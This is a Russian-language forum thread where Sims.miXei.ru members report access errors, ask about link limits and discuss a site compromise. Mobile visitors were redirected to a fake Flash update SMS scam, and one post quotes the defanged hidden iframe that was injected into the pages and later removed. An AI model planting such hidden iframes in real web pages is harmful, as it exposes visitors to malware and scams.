• Уважаемый посетитель!!!
    Если Вы уже являетесь зарегистрированным участником проекта "миХей.ру - дискусcионный клуб",
    пожалуйста, восстановите свой пароль самостоятельно, либо свяжитесь с администратором через Телеграм.

Работа сайта Sims.miXei.ru: обсуждение, идеи, сообщения об ошибках

Ееее я не могу посещать некоторые темы там что то пишет но я ничего не понимаю =(
П.С. там написано по русски

Вот это мне пишет

SASHA, вы не имеете прав для доступа к этой странице. Это может быть вызвано несколькими причинами:
Ваш аккаунт имеет недостаточно прав для доступа к этой странице. Вы пытаетесь редактировать чьё-то сообщение, использовать административные полномочия или прочие опции ограниченного доступа?
Вы пытаетесь написать сообщение, но ваш аккаунт отключён администрацией или ожидает активации.

Не знаю, где задать вопрос.
Какое максимальное количество ссылок может быть в одном сообщении?

В теме "Мой мир", в самом первом сообщении, выкладываю ссылки на свои сообщения с новостями "Моего мира". Какой лимит на эти ссылки? Что мне делать, когда достигну этого лимита? (Как организовать свою тему?)

Simsikiri,
Гера в комментариях Sims.miXei.ru написал(а):
Там был вредоносный код другого характера. Если с телефона или планшета зайти на сайт, то срабатывало автоматическое перенаправление на якобы сайт adobe flash player, на самом же деле, там сайта "отправь смс и обнови flash". В общем, лохотрон очередной.
Гера в комментариях Sims.miXei.ru написал(а):
Перепроверка будет только через пару дней. До этих пор оповещение будет висеть.

Пля, а нельзя обьяву повесить на сайте, чтобы люди не велись на эти обновы?!
Я вот конечно без "пля", но присоединяюсь, напишите уже какое-нибудь оповещение для посетителей, а то мне кажется вы уже их потеряли много из-за этого недоразумения...

Simmer, мне из подержки написали что этот код <_iframe src="h__p://cbtdzmgqby.sytes.net/atb/counter.php" width=1 height=1 style="visibility: hidden"></_iframe>
являетьяс вредоносним.

Вроде все почистил, не знаю насколько долго нам не подкинут новых вирусов. Вот отчет яндекса:

2325566.jpg

2325569.jpg

Не знаю, через сколько Касперски простит все обиды и перестанет на нас дуться, по идее, должен уже перестать. Но для меня самое главное, яндекс не выкинет нас из своих баз поиска.

Ребята я не знаю куда писать, но может мне кто объяснит почему я битых 10 часов не могла зайти на форум? Выдавало ошибку 403 и говорили что я не могу зайти.А сейчас все нормально.Просто мне интересно это у меня или у вас ошибка была?

Назад
Сверху